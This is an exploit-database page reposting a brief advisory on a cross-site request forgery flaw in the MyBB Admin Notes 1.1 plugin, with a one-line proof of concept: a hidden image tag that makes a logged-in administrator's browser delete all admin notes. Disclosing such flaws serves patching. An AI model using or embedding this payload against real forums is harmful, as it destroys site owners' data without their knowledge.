Edit Report

Our sensors found this exploit at:

Below is a copy:

MyBB Admin Notes 1.1 Cross Site Request Forgery
# Exploit Title: MyBB Admin Notes Plugin - CSRF
# Date: 2018-05-14
# Author: 0xB9
# Contact: or 0xB9[at]
# Software Link:
# Version: 1.1
# Tested on: Ubuntu 18.04
# 1. Description: The plugin allows administrators to save notes and display them in a list in the ACP. The CSRF allows an attacker to remotely delete all admin notes.
# 2. Proof of Concept:
        <img style="display:none" src="http://localhost/mybb/admin/index.php?empty=table" alt="">
# 3. Solution:
# Update to the latest release
# Patch:

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.